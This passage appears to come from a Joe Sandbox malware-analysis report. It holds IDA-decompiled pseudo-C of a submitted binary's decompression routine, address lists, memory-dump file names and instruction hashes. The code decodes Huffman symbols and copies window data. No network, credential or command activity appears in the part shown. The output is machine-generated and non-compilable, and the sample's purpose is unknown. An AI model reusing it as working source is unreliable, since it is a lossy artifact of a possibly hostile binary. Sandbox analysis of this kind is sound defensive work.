                												_t504 = (_t475 >> _t605 - _t696 << 4) +  *(_t697 + 0x20);
                												_t609 =  *(_t697 + 0x10) + 0xfffffffc + _t696;
                												_t689 = _t684 + 4;
                												_t665 =  *(_t697 + 0x14) + (_t609 >> 3);
                												_t610 = _t609 & 0x00000007;
                												 *(_t697 + 0x14) = _t665;
                												 *_t689 = _t665;
                												 *(_t697 + 0x10) = _t610;
                												_t689[1] = _t610;
                											}
                											_t463 = E003DA89D(_t689);
                											_t464 =  *(_t684 + 0x1efc);
                											_t660 = _t463 & 0x0000fffe;
                											__eflags = _t660 -  *((intOrPtr*)(_t684 + 0x1e7c + _t464 * 4));
                											if(_t660 >=  *((intOrPtr*)(_t684 + 0x1e7c + _t464 * 4))) {
                												L53:
                												_t589 = 0xf;
                												_t465 = _t464 + 1;
                												 *(_t697 + 0x18) = _t589;
                												__eflags = _t465 - _t589;
                												if(_t465 >= _t589) {
                													L59:
                													_t591 = _t689[1] +  *(_t697 + 0x18);
                													 *_t689 =  *_t689 + (_t591 >> 3);
                													_t468 =  *(_t697 + 0x18);
                													_t689[1] = _t591 & 0x00000007;
                													_t593 = 0x10;
                													_t596 =  *((intOrPtr*)(_t684 + 0x1ebc + _t468 * 4)) + (_t660 -  *((intOrPtr*)(_t684 + 0x1e78 + _t468 * 4)) >> _t593 - _t468);
                													__eflags = _t596 -  *((intOrPtr*)(_t684 + 0x1e78));
                													asm("sbb eax, eax");
                													_t469 = _t468 & _t596;
                													__eflags = _t469;
                													_t470 =  *(_t684 + 0x2b00 + _t469 * 2) & 0x0000ffff;
                													goto L60;
                												}
                												L54:
                												_t598 = _t684 + (_t465 + 0x79f) * 4;
                												while(1) {
                													L55:
                													__eflags = _t660 -  *_t598;
                													if(_t660 <  *_t598) {
                														break;
                													}
                													L56:
                													_t465 = _t465 + 1;
                													_t598 = _t598 + 4;
                													__eflags = _t465 - 0xf;
                													if(_t465 < 0xf) {
                														continue;
                													}
                													L57:
                													goto L59;
                												}
                												L58:
                												 *(_t697 + 0x18) = _t465;
                												goto L59;
                											} else {
                												L52:
                												_t599 = 0x10;
                												_t663 = _t660 >> _t599 - _t464;
                												_t602 = ( *(_t663 + _t684 + 0x1f00) & 0x000000ff) +  *(_t697 + 0x10);
                												 *_t689 = (_t602 >> 3) +  *(_t697 + 0x14);
                												_t689[1] = _t602 & 0x00000007;
                												_t470 =  *(_t684 + 0x2300 + _t663 * 2) & 0x0000ffff;
                												L60:
                												_t504 = _t504 + (_t470 & 0x0000ffff);
                												__eflags = _t504;
                												L61:
                												 *(_t697 + 0x18) = _t504;
                												goto L64;
                											}
                										}
                										L45:
                										_t504 = _t450 + 1;
                										goto L61;
                									}
                								}
                								L27:
                								__eflags =  *((char*)(_t684 + 0x4c44));
                								if( *((char*)(_t684 + 0x4c44)) == 0) {
                									 *( *((intOrPtr*)(_t684 + 0x4b40)) +  *(_t684 + 0x7c)) = _t636;
                									_t525 = _t684 + 0x7c;
                									 *_t525 =  *_t525 + 1;
                									continue;
                								} else {
                									 *(_t684 + 0x7c) =  *(_t684 + 0x7c) + 1;
                									 *((char*)(E003E2391(_t684 + 0x4b44,  *(_t684 + 0x7c)))) = _t672 & 0x0000ffff;
                									goto L0;
                								}
                							}
                						}
                						L12:
                						__eflags = _t526 -  *(_t684 + 0x7c);
                						if(_t526 ==  *(_t684 + 0x7c)) {
                							goto L17;
                						}
                						L13:
                						E003E5202(_t684);
                						_t360 =  *(_t684 + 0x4c5c);
                						__eflags = _t360 -  *((intOrPtr*)(_t684 + 0x4c4c));
                						if(__eflags > 0) {
                							goto L98;
                						}
                						L14:
                						if(__eflags < 0) {
                							L16:
                							__eflags =  *((char*)(_t684 + 0x4c50));
                							if( *((char*)(_t684 + 0x4c50)) != 0) {
                								L156:
                								 *((char*)(_t684 + 0x4c60)) = 0;
                								goto L98;
                							}
                							goto L17;
                						}
                						L15:
                						_t360 =  *(_t684 + 0x4c58);
                						__eflags = _t360 -  *((intOrPtr*)(_t684 + 0x4c48));
                						if(_t360 >  *((intOrPtr*)(_t684 + 0x4c48))) {
                							goto L98;
                						}
                						goto L16;
                					}
                				}
                			}

                0x003e6835
                0x003e6835
                0x003e6838
                0x003e683d
                0x003e6842
                0x003e6843
                0x003e6845
                0x003e6847
                0x003e6849
                0x003e6849
                0x003e6849
                0x003e684e
                0x003e6852
                0x00000000
                0x003e6852
                0x003e67e6
                0x003e67e8
                0x003e67e8
                0x003e67eb
                0x003e67eb
                0x003e67ed
                0x003e67ef
                0x003e67f5
                0x003e67fb
                0x003e6801
                0x003e6807
                0x003e680d
                0x003e6813
                0x003e6816
                0x003e6819
                0x003e681b
                0x003e681e
                0x003e6820
                0x003e6820
                0x003e6820
                0x003e6825
                0x00000000
                0x003e6783
                0x003e6783
                0x003e6783
                0x003e678c
                0x003e678d
                0x00000000
                0x003e678d
                0x003e6781
                0x003e65fc
                0x003e65fc
                0x003e65ff
                0x003e670e
                0x003e6711
                0x003e671a
                0x003e6723
                0x003e6727
                0x003e672b
                0x003e6732
                0x003e673c
                0x003e673f
                0x00000000
                0x003e673f
                0x003e6605
                0x003e6605
                0x003e6649
                0x003e6607
                0x003e660a
                0x003e6617
                0x003e6626
                0x003e662a
                0x003e662e
                0x003e6634
                0x003e6636
                0x003e6639
                0x003e663d
                0x003e6640
                0x003e6644
                0x003e6644
                0x003e664e
                0x003e6655
                0x003e665b
                0x003e6661
                0x003e6668
                0x003e6699
                0x003e669b
                0x003e669c
                0x003e669d
                0x003e66a1
                0x003e66a3
                0x003e66c1
                0x003e66c4
                0x003e66d0
                0x003e66d3
                0x003e66d7
                0x003e66dc
                0x003e66ef
                0x003e66f1
                0x003e66f7
                0x003e66f9
                0x003e66f9
                0x003e66fb
                0x00000000
                0x003e66fb
                0x003e66a5
                0x003e66ab
                0x003e66ae
                0x003e66ae
                0x003e66ae
                0x003e66b0
                0x00000000
                0x00000000
                0x003e66b2
                0x003e66b2
                0x003e66b3
                0x003e66b6
                0x003e66b9
                0x00000000
                0x00000000
                0x003e66bb
                0x00000000
                0x003e66bb
                0x003e66bd
                0x003e66bd
                0x00000000
                0x003e666a
                0x003e666a
                0x003e666c
                0x003e666f
                0x003e6679
                0x003e6689
                0x003e668c
                0x003e668f
                0x003e6703
                0x003e6706
                0x003e6706
                0x003e6708
                0x003e6708
                0x00000000
                0x003e6708
                0x003e6668
                0x003e65d2
                0x003e65d2
                0x00000000
                0x003e65d2
                0x003e6522
                0x003e645f
                0x003e645f
                0x003e6466
                0x003e6490
                0x003e6493
                0x003e6496
                0x00000000
                0x003e6468
                0x003e6475
                0x003e6480
                0x00000000
                0x003e6480
                0x003e6466
                0x003e63ba
                0x003e635f
                0x003e635f
                0x003e6362
                0x00000000
                0x00000000
                0x003e6364
                0x003e6366
                0x003e636b
                0x003e6371
                0x003e6377
                0x00000000
                0x00000000
                0x003e637d
                0x003e637d
                0x003e6391
                0x003e6391
                0x003e6398
                0x003e6cd0
                0x003e6cd0
                0x00000000
                0x003e6cd0
                0x00000000
                0x003e6398
                0x003e637f
                0x003e637f
                0x003e6385
                0x003e638b
                0x00000000
                0x00000000
                0x00000000
                0x003e638b
                0x003e62cd

                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: b6eb7e628c131b77d64230efdf3487e18faf11e64f64428999ea75b77c32f4a9
                • Instruction ID: 83c308b37a0b5685beec4634b1a05f73c08eecd738d1ffeadeaf45bf63eb55c5
                • Opcode Fuzzy Hash: b6eb7e628c131b77d64230efdf3487e18faf11e64f64428999ea75b77c32f4a9
                • Instruction Fuzzy Hash: DF620B716047D48FCB16CF29C8916B9BBE1BFA5344F058A6DE8DA8B386D730E945CB10
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 98%
                			E003E77EF(signed int __ecx) {
                				signed int _t363;
                				signed int _t367;
                				signed int _t368;
                				signed int _t369;
                				signed int _t373;
                				signed int _t374;
                				signed int _t375;
                				signed int _t376;
                				signed int _t377;
                				signed int _t378;
                				signed int _t381;
                				signed int _t382;
                				signed int _t383;
                				void* _t385;
                				signed int _t388;
                				signed int _t389;
                				intOrPtr _t391;
                				signed int _t401;
                				char _t410;
                				unsigned int _t411;
                				void* _t421;
                				signed int _t422;
                				signed int _t423;
                				intOrPtr _t425;
                				signed int _t428;
                				char _t437;
                				signed int _t439;
                				signed int _t441;
                				signed int _t444;
                				signed int* _t445;
                				signed int _t446;
                				signed int _t447;
                				signed int _t448;
                				signed int _t452;
                				signed int _t453;
                				signed int _t454;
                				signed int _t457;
                				void* _t462;
                				signed int _t463;
                				signed int _t464;
                				intOrPtr _t466;
                				signed int _t469;
                				char _t478;
                				unsigned int _t479;
                				signed int* _t483;
                				signed int _t484;
                				signed int _t485;
                				signed int _t486;
                				signed int _t491;
                				signed int _t492;
                				signed short _t493;
                				unsigned int _t499;
                				signed int _t500;
                				signed int* _t506;
                				unsigned int _t507;
                				intOrPtr _t520;
                				intOrPtr* _t521;
                				intOrPtr _t523;
                				signed int* _t524;
                				signed int _t525;
                				intOrPtr _t526;
                				signed int _t528;
                				void* _t529;
                				signed int _t532;
                				signed int* _t534;
                				unsigned int _t537;
                				signed int _t538;
                				void* _t539;
                				signed int _t542;
                				signed int _t544;
                				signed int _t547;
                				void* _t549;
                				unsigned int _t552;
                				signed int _t553;
                				intOrPtr* _t555;
                				void* _t556;
                				signed int _t559;
                				signed int _t560;
                				signed int _t561;
                				signed int _t564;
                				signed int* _t569;
                				void* _t570;
                				signed int _t573;
                				signed int _t575;
                				signed int _t577;
                				signed int _t580;
                				void* _t582;
                				unsigned int _t585;
                				signed int _t586;
                				signed int _t588;
                				signed int _t590;
                				void* _t592;
                				signed int _t595;
                				intOrPtr* _t597;
                				void* _t598;
                				signed int _t601;
                				void* _t604;
                				signed int _t607;
                				signed int _t608;
                				intOrPtr* _t610;
                				void* _t611;
                				signed int _t614;
                				signed int _t615;
                				void* _t617;
                				signed int _t620;
                				intOrPtr* _t623;
                				void* _t624;
                				signed int _t628;
                				unsigned int _t630;
                				signed int _t633;
                				signed int _t634;
                				signed int _t635;
                				unsigned int _t637;
                				signed int _t640;
                				void* _t643;
                				signed int* _t644;
                				signed int _t645;
                				signed int _t646;
                				void* _t649;
                				unsigned int _t651;
                				signed int _t654;
                				signed int _t658;
                				void* _t661;
                				signed int* _t662;
                				unsigned int _t664;
                				signed int _t667;
                				signed int _t669;
                				signed int _t670;
                				signed int _t671;
                				intOrPtr* _t672;
                				signed int _t673;
                				signed int* _t674;
                				signed int _t676;
                				signed int _t677;
                				unsigned int _t681;
                				signed int _t682;
                				signed int _t686;
                				signed int _t687;
                				signed int _t688;
                				signed int _t689;
                				signed int* _t690;
                				signed int* _t691;
                				signed int* _t692;
                				signed int _t694;
                				unsigned int _t696;
                				signed int _t697;
                				signed int _t698;
                				signed int* _t699;
                				signed int _t702;
                				signed int _t704;
                				signed int _t705;
                				signed int _t707;
                				signed int _t709;
                				char* _t710;
                				signed int _t711;
                				unsigned int _t713;
                				signed int _t714;
                				signed int _t715;
                				signed int _t716;
                				signed int _t723;
                				signed int _t724;
                				void* _t725;
                
                				_t520 =  *((intOrPtr*)(_t725 + 0x40));
                				_t686 = __ecx;
                				_t692 = _t520 + 4;
                				 *(_t725 + 0x24) = __ecx;
                				_t672 = _t520 + 0x18;
                				 *(_t725 + 0x10) = _t692;
                				if( *((char*)(_t520 + 0x2c)) != 0) {
                					 *(_t725 + 0x10) = _t692;
                					L4:
                					_t523 =  *_t672;
                					if( *_t692 <=  *((intOrPtr*)(_t520 + 0x24)) + _t523) {
                						_t363 =  *((intOrPtr*)(_t520 + 0x20)) - 1 + _t523;
                						_t694 =  *((intOrPtr*)(_t520 + 0x4acc)) - 0x10;
                						 *(_t725 + 0x18) = _t363;
                						 *(_t725 + 0x14) = _t694;
                						 *(_t725 + 0x2c) = _t363;
                						__eflags = _t363 - _t694;
                						if(_t363 >= _t694) {
                							 *(_t725 + 0x2c) = _t694;
                						}
                						_t524 =  *(_t725 + 0x10);
                						while(1) {
                							_t673 =  *(_t686 + 0xe6dc);
                							_t628 =  *(_t686 + 0x7c) & _t673;
                							 *(_t686 + 0x7c) = _t628;
                							_t525 =  *_t524;
                							__eflags = _t525 -  *(_t725 + 0x2c);
                							if(_t525 <  *(_t725 + 0x2c)) {
                								goto L19;
                							}
                							L13:
                							__eflags = _t525 - _t363;
                							if(__eflags > 0) {
                								L145:
                								return 1;
                							}
                							if(__eflags != 0) {
                								L16:
                								__eflags = _t525 - _t705;
                								if(_t525 < _t705) {
                									L18:
                									__eflags = _t525 -  *((intOrPtr*)(_t520 + 0x4acc));
                									if(_t525 >=  *((intOrPtr*)(_t520 + 0x4acc))) {
                										L144:
                										 *((char*)(_t520 + 0x4ad3)) = 1;
                										goto L145;
                									}
                									goto L19;
                								}
                								__eflags =  *((char*)(_t520 + 0x4ad2));
                								if( *((char*)(_t520 + 0x4ad2)) == 0) {
                									goto L144;
                								}
                								goto L18;
                							}
                							__eflags =  *((intOrPtr*)(_t520 + 8)) -  *((intOrPtr*)(_t520 + 0x1c));
                							if( *((intOrPtr*)(_t520 + 8)) >=  *((intOrPtr*)(_t520 + 0x1c))) {
                								goto L145;
                							}
                							goto L16;
                							L19:
                							_t526 =  *((intOrPtr*)(_t686 + 0x4b3c));
                							__eflags = (_t526 - _t628 & _t673) - 0x1004;
                							if((_t526 - _t628 & _t673) >= 0x1004) {
                								L24:
                								_t674 =  *(_t725 + 0x10);
                								_t367 = E003DA89D(_t674);
                								_t368 =  *(_t520 + 0xb4);
                								_t630 = _t367 & 0x0000fffe;
                								__eflags = _t630 -  *((intOrPtr*)(_t520 + 0x34 + _t368 * 4));
                								if(_t630 >=  *((intOrPtr*)(_t520 + 0x34 + _t368 * 4))) {
                									_t528 = 0xf;
                									_t369 = _t368 + 1;
                									 *(_t725 + 0x28) = _t528;
                									__eflags = _t369 - _t528;
                									if(_t369 >= _t528) {
                										L32:
                										_t696 = _t674[1] + _t528;
                										_t697 = _t696 & 0x00000007;
                										 *_t674 =  *_t674 + (_t696 >> 3);
                										 *(_t725 + 0x1c) =  *_t674;
                										_t373 =  *(_t725 + 0x28);
                										_t674[1] = _t697;
                										_t529 = 0x10;
                										_t532 =  *((intOrPtr*)(_t520 + 0x74 + _t373 * 4)) + (_t630 -  *((intOrPtr*)(_t520 + 0x30 + _t373 * 4)) >> _t529 - _t373);
                										__eflags = _t532 -  *((intOrPtr*)(_t520 + 0x30));
                										asm("sbb eax, eax");
                										_t374 = _t373 & _t532;
                										__eflags = _t374;
                										_t524 =  *(_t725 + 0x10);
                										_t633 =  *(_t520 + 0xcb8 + _t374 * 2) & 0x0000ffff;
                										_t375 =  *(_t725 + 0x1c);
                										L33:
                										_t634 = _t633 & 0x0000ffff;
                										__eflags = _t634 - 0x100;
                										if(_t634 >= 0x100) {
                											__eflags = _t634 - 0x106;
                											if(_t634 < 0x106) {
                												__eflags = _t634 - 0x100;
                												if(_t634 != 0x100) {
                													__eflags = _t634 - 0x101;
                													if(_t634 != 0x101) {
                														_t635 = _t634 + 0xfffffefe;
                														__eflags = _t635;
                														_t534 = _t686 + (_t635 + 0x18) * 4;
                														_t698 =  *_t534;
                														 *(_t725 + 0x28) = _t698;
                														if(_t635 == 0) {
                															L117:
                															 *(_t686 + 0x60) = _t698;
                															_t699 =  *(_t725 + 0x10);
                															_t376 = E003DA89D(_t699);
                															_t377 =  *(_t520 + 0x2d78);
                															_t637 = _t376 & 0x0000fffe;
                															__eflags = _t637 -  *((intOrPtr*)(_t520 + 0x2cf8 + _t377 * 4));
                															if(_t637 >=  *((intOrPtr*)(_t520 + 0x2cf8 + _t377 * 4))) {
                																_t676 = 0xf;
                																_t378 = _t377 + 1;
                																__eflags = _t378 - _t676;
                																if(_t378 >= _t676) {
                																	L125:
                																	_t537 = _t699[1] + _t676;
                																	_t538 = _t537 & 0x00000007;
                																	_t699[1] = _t538;
                																	 *_t699 =  *_t699 + (_t537 >> 3);
                																	_t381 =  *_t699;
                																	 *(_t725 + 0x34) = _t538;
                																	_t539 = 0x10;
                																	 *(_t725 + 0x30) = _t381;
                																	_t542 =  *((intOrPtr*)(_t520 + 0x2d38 + _t676 * 4)) + (_t637 -  *((intOrPtr*)(_t520 + 0x2cf4 + _t676 * 4)) >> _t539 - _t676);
                																	__eflags = _t542 -  *((intOrPtr*)(_t520 + 0x2cf4));
                																	asm("sbb eax, eax");
                																	_t382 = _t381 & _t542;
                																	__eflags = _t382;
                																	_t383 =  *(_t520 + 0x397c + _t382 * 2) & 0x0000ffff;
                																	L126:
                																	_t677 = _t383 & 0x0000ffff;
                																	__eflags = _t677 - 8;
                																	if(_t677 >= 8) {
                																		_t702 = (_t677 >> 2) - 1;
                																		_t681 = ((_t677 & 0x00000003 | 0x00000004) << _t702) + 2;
                																		__eflags = _t702;
                																		if(_t702 != 0) {
                																			_t411 = E003DA89D( *(_t725 + 0x10));
                																			_t644 =  *(_t725 + 0x10);
                																			_t549 = 0x10;
                																			_t681 = _t681 + (_t411 >> _t549 - _t702);
                																			_t552 =  *(_t725 + 0x34) + _t702;
                																			_t553 = _t552 & 0x00000007;
                																			__eflags = _t553;
                																			 *_t644 = (_t552 >> 3) +  *(_t725 + 0x30);
                																			_t644[1] = _t553;
                																		}
                																	} else {
                																		_t681 = _t677 + 2;
                																	}
                																	_t640 =  *(_t686 + 0x7c);
                																	_t544 =  *(_t725 + 0x28);
                																	_t385 =  *((intOrPtr*)(_t686 + 0xe6d8)) + 0xffffeffc;
                																	_t704 = _t640 - _t544;
                																	 *(_t686 + 0x74) = _t681;
                																	__eflags = _t704 - _t385;
                																	if(_t704 >= _t385) {
                																		L140:
                																		_t524 =  *(_t725 + 0x10);
                																		_t363 =  *(_t725 + 0x18);
                																		__eflags = _t681;
                																		if(_t681 == 0) {
                																			goto L11;
                																		}
                																		_t388 =  *(_t686 + 0xe6dc);
                																		do {
                																			_t389 = _t388 & _t704;
                																			_t704 = _t704 + 1;
                																			 *((char*)( *((intOrPtr*)(_t686 + 0x4b40)) + _t640)) =  *((intOrPtr*)(_t389 +  *((intOrPtr*)(_t686 + 0x4b40))));
                																			_t388 =  *(_t686 + 0xe6dc);
                																			_t640 =  *(_t686 + 0x7c) + 0x00000001 & _t388;
                																			 *(_t686 + 0x7c) = _t640;
                																			_t681 = _t681 - 1;
                																			__eflags = _t681;
                																		} while (_t681 != 0);
                																		goto L35;
                																	} else {
                																		__eflags = _t640 - _t385;
                																		if(_t640 >= _t385) {
                																			goto L140;
                																		}
                																		_t391 =  *((intOrPtr*)(_t686 + 0x4b40));
                																		_t521 = _t391 + _t704;
                																		_t710 = _t391 + _t640;
                																		_t643 = 8;
                																		 *(_t686 + 0x7c) = _t640 + _t681;
                																		__eflags = _t681 - _t643;
                																		if(_t681 < _t643) {
                																			L84:
                																			_t363 =  *(_t725 + 0x18);
                																			_t524 =  *(_t725 + 0x10);
                																			__eflags = _t681;
                																			if(_t681 == 0) {
                																				L10:
                																				_t520 =  *((intOrPtr*)(_t725 + 0x4c));
                																				L11:
                																				_t705 =  *(_t725 + 0x14);
                																				continue;
                																				do {
                																					do {
                																						_t673 =  *(_t686 + 0xe6dc);
                																						_t628 =  *(_t686 + 0x7c) & _t673;
                																						 *(_t686 + 0x7c) = _t628;
                																						_t525 =  *_t524;
                																						__eflags = _t525 -  *(_t725 + 0x2c);
                																						if(_t525 <  *(_t725 + 0x2c)) {
                																							goto L19;
                																						}
                																						goto L13;
                																					} while (_t681 == 0);
                																					_t646 =  *(_t686 + 0x7c);
                																					_t561 =  *(_t686 + 0x60);
                																					_t421 =  *((intOrPtr*)(_t686 + 0xe6d8)) + 0xffffeffc;
                																					_t709 = _t646 - _t561;
                																					__eflags = _t709 - _t421;
                																					if(_t709 >= _t421) {
                																						L112:
                																						_t422 =  *(_t686 + 0xe6dc);
                																						do {
                																							_t423 = _t422 & _t709;
                																							_t709 = _t709 + 1;
                																							 *((char*)( *((intOrPtr*)(_t686 + 0x4b40)) + _t646)) =  *((intOrPtr*)(_t423 +  *((intOrPtr*)(_t686 + 0x4b40))));
                																							_t422 =  *(_t686 + 0xe6dc);
                																							_t646 =  *(_t686 + 0x7c) + 0x00000001 & _t422;
                																							 *(_t686 + 0x7c) = _t646;
                																							_t681 = _t681 - 1;
                																							__eflags = _t681;
                																						} while (_t681 != 0);
                																						L35:
                																						_t524 =  *(_t725 + 0x10);
                																						_t363 =  *(_t725 + 0x18);
                																						goto L11;
                																					}
                																					__eflags = _t646 - _t421;
                																					if(_t646 >= _t421) {
                																						goto L112;
                																					}
                																					_t425 =  *((intOrPtr*)(_t686 + 0x4b40));
                																					_t521 = _t425 + _t709;
                																					_t710 = _t425 + _t646;
                																					_t649 = 8;
                																					 *(_t686 + 0x7c) = _t646 + _t681;
                																					__eflags = _t681 - _t649;
                																					if(_t681 < _t649) {
                																						goto L84;
                																					}
                																					__eflags = _t561 - _t681;
                																					if(_t561 >= _t681) {
                																						_t428 = _t681 >> 3;
                																						__eflags = _t428;
                																						 *(_t725 + 0x34) = _t428;
                																						_t688 = _t428;
                																						do {
                																							E003F0320(_t710, _t521, _t649);
                																							_t725 = _t725 + 0xc;
                																							_t649 = 8;
                																							_t521 = _t521 + _t649;
                																							_t710 = _t710 + _t649;
                																							_t681 = _t681 - _t649;
                																							_t688 = _t688 - 1;
                																							__eflags = _t688;
                																						} while (_t688 != 0);
                																						L83:
                																						_t686 =  *(_t725 + 0x24);
                																						goto L84;
                																					}
                																					_t564 = _t681 >> 3;
                																					__eflags = _t564;
                																					do {
                																						_t681 = _t681 - _t649;
                																						 *_t710 =  *_t521;
                																						 *((char*)(_t710 + 1)) =  *((intOrPtr*)(_t521 + 1));
                																						 *((char*)(_t710 + 2)) =  *((intOrPtr*)(_t521 + 2));
                																						 *((char*)(_t710 + 3)) =  *((intOrPtr*)(_t521 + 3));
                																						 *((char*)(_t710 + 4)) =  *((intOrPtr*)(_t521 + 4));
                																						 *((char*)(_t710 + 5)) =  *((intOrPtr*)(_t521 + 5));
                																						 *((char*)(_t710 + 6)) =  *((intOrPtr*)(_t521 + 6));
                																						_t437 =  *((intOrPtr*)(_t521 + 7));
                																						_t521 = _t521 + _t649;
                																						 *((char*)(_t710 + 7)) = _t437;
                																						_t710 = _t710 + _t649;
                																						_t564 = _t564 - 1;
                																						__eflags = _t564;
                																					} while (_t564 != 0);
                																					goto L84;
                																					L92:
                																					_t524 =  *(_t725 + 0x10);
                																					_t705 =  *(_t725 + 0x14);
                																					_t363 =  *(_t725 + 0x18);
                																					__eflags = _t681;
                																				} while (_t681 == 0);
                																				_t463 =  *(_t686 + 0xe6dc);
                																				_t716 =  *(_t725 + 0x34);
                																				do {
                																					_t464 = _t463 & _t716;
                																					_t716 = _t716 + 1;
                																					 *((char*)( *((intOrPtr*)(_t686 + 0x4b40)) + _t658)) =  *((intOrPtr*)(_t464 +  *((intOrPtr*)(_t686 + 0x4b40))));
                																					_t463 =  *(_t686 + 0xe6dc);
                																					_t658 =  *(_t686 + 0x7c) + 0x00000001 & _t463;
                																					 *(_t686 + 0x7c) = _t658;
                																					_t681 = _t681 - 1;
                																					__eflags = _t681;
                																				} while (_t681 != 0);
                																				goto L35;
                																			}
                																			 *_t710 =  *_t521;
                																			_t363 =  *(_t725 + 0x18);
                																			__eflags = _t681 - 1;
                																			if(_t681 <= 1) {
                																				goto L10;
                																			}
                																			 *((char*)(_t710 + 1)) =  *((intOrPtr*)(_t521 + 1));
                																			_t363 =  *(_t725 + 0x18);
                																			__eflags = _t681 - 2;
                																			if(_t681 <= 2) {
                																				goto L10;
                																			}
                																			 *((char*)(_t710 + 2)) =  *((intOrPtr*)(_t521 + 2));
                																			_t363 =  *(_t725 + 0x18);
                																			__eflags = _t681 - 3;
                																			if(_t681 <= 3) {
                																				goto L10;
                																			}
                																			 *((char*)(_t710 + 3)) =  *((intOrPtr*)(_t521 + 3));
                																			_t363 =  *(_t725 + 0x18);
                																			__eflags = _t681 - 4;
                																			if(_t681 <= 4) {
                																				goto L10;
                																			}
                																			 *((char*)(_t710 + 4)) =  *((intOrPtr*)(_t521 + 4));
                																			_t363 =  *(_t725 + 0x18);
                																			__eflags = _t681 - 5;
                																			if(_t681 <= 5) {
                																				goto L10;
                																			}
                																			 *((char*)(_t710 + 5)) =  *((intOrPtr*)(_t521 + 5));
                																			_t363 =  *(_t725 + 0x18);
                																			__eflags = _t681 - 6;
                																			if(_t681 <= 6) {
                																				goto L10;
                																			}
                																			_t520 =  *((intOrPtr*)(_t725 + 0x4c));
                																			 *((char*)(_t710 + 6)) =  *((intOrPtr*)(_t521 + 6));
                																			goto L35;
                																		}
                																		__eflags = _t544 - _t681;
                																		if(_t544 >= _t681) {
                																			_t401 = _t681 >> 3;
                																			__eflags = _t401;
                																			 *(_t725 + 0x34) = _t401;
                																			_t687 = _t401;
                																			do {
                																				E003F0320(_t710, _t521, _t643);
                																				_t725 = _t725 + 0xc;
                																				_t643 = 8;
                																				_t521 = _t521 + _t643;
                																				_t710 = _t710 + _t643;
                																				_t681 = _t681 - _t643;
                																				_t687 = _t687 - 1;
                																				__eflags = _t687;
                																			} while (_t687 != 0);
                																			goto L83;
                																		}
                																		_t547 = _t681 >> 3;
                																		__eflags = _t547;
                																		do {
                																			_t681 = _t681 - _t643;
                																			 *_t710 =  *_t521;
                																			 *((char*)(_t710 + 1)) =  *((intOrPtr*)(_t521 + 1));
                																			 *((char*)(_t710 + 2)) =  *((intOrPtr*)(_t521 + 2));
                																			 *((char*)(_t710 + 3)) =  *((intOrPtr*)(_t521 + 3));
                																			 *((char*)(_t710 + 4)) =  *((intOrPtr*)(_t521 + 4));
                																			 *((char*)(_t710 + 5)) =  *((intOrPtr*)(_t521 + 5));
                																			 *((char*)(_t710 + 6)) =  *((intOrPtr*)(_t521 + 6));
                																			_t410 =  *((intOrPtr*)(_t521 + 7));
                																			_t521 = _t521 + _t643;
                																			 *((char*)(_t710 + 7)) = _t410;
                																			_t710 = _t710 + _t643;
                																			_t547 = _t547 - 1;
                																			__eflags = _t547;
                																		} while (_t547 != 0);
                																		goto L84;
                																	}
                																}
                																_t555 = _t520 + (_t378 + 0xb3e) * 4;
                																while(1) {
                																	__eflags = _t637 -  *_t555;
                																	if(_t637 <  *_t555) {
                																		break;
                																	}
                																	_t378 = _t378 + 1;
                																	_t555 = _t555 + 4;
                																	__eflags = _t378 - 0xf;
                																	if(_t378 < 0xf) {
                																		continue;
                																	}
                																	goto L125;
                																}
                																_t676 = _t378;
                																goto L125;
                															}
                															_t556 = 0x10;
                															_t645 = _t637 >> _t556 - _t377;
                															_t559 = ( *(_t645 + _t520 + 0x2d7c) & 0x000000ff) + _t699[1];
                															 *_t699 =  *_t699 + (_t559 >> 3);
                															_t560 = _t559 & 0x00000007;
                															 *(_t725 + 0x30) =  *_t699;
                															_t699[1] = _t560;
                															_t383 =  *(_t520 + 0x317c + _t645 * 2) & 0x0000ffff;
                															 *(_t725 + 0x34) = _t560;
                															goto L126;
                														} else {
                															goto L116;
                														}
                														do {
                															L116:
                															 *_t534 =  *(_t534 - 4);
                															_t534 = _t534 - 4;
                															_t635 = _t635 - 1;
                															__eflags = _t635;
                														} while (_t635 != 0);
                														goto L117;
                													}
                													_t681 =  *(_t686 + 0x74);
                													_t705 =  *(_t725 + 0x14);
                													_t363 =  *(_t725 + 0x18);
                													__eflags = _t681;
                												}
                												_push(_t725 + 0x38);
                												_t439 = E003E3F9D(_t686, _t524);
                												__eflags = _t439;
                												if(_t439 == 0) {
                													goto L145;
                												}
                												_t441 = E003E253E(_t686, _t725 + 0x38);
                												__eflags = _t441;
                												if(_t441 == 0) {
                													goto L145;
                												}
                												goto L35;
                											}
                											_t682 = _t634 - 0x106;
                											__eflags = _t682 - 8;
                											if(_t682 >= 8) {
                												_t444 = (_t682 >> 2) - 1;
                												 *(_t725 + 0x34) = _t444;
                												_t681 = ((_t682 & 0x00000003 | 0x00000004) << _t444) + 2;
                												__eflags = _t444;
                												if(_t444 == 0) {
                													L39:
                													_t445 =  *(_t725 + 0x10);
                													L40:
                													_t446 = E003DA89D(_t445);
                													_t447 =  *(_t520 + 0xfa0);
                													_t651 = _t446 & 0x0000fffe;
                													__eflags = _t651 -  *((intOrPtr*)(_t520 + 0xf20 + _t447 * 4));
                													if(_t651 >=  *((intOrPtr*)(_t520 + 0xf20 + _t447 * 4))) {
                														_t711 = 0xf;
                														_t448 = _t447 + 1;
                														 *(_t725 + 0x28) = _t711;
                														__eflags = _t448 - _t711;
                														if(_t448 >= _t711) {
                															L50:
                															_t569 =  *(_t725 + 0x10);
                															_t713 = _t569[1] +  *(_t725 + 0x2c);
                															_t714 = _t713 & 0x00000007;
                															 *_t569 =  *_t569 + (_t713 >> 3);
                															 *(_t725 + 0x24) =  *_t569;
                															_t452 =  *(_t725 + 0x2c);
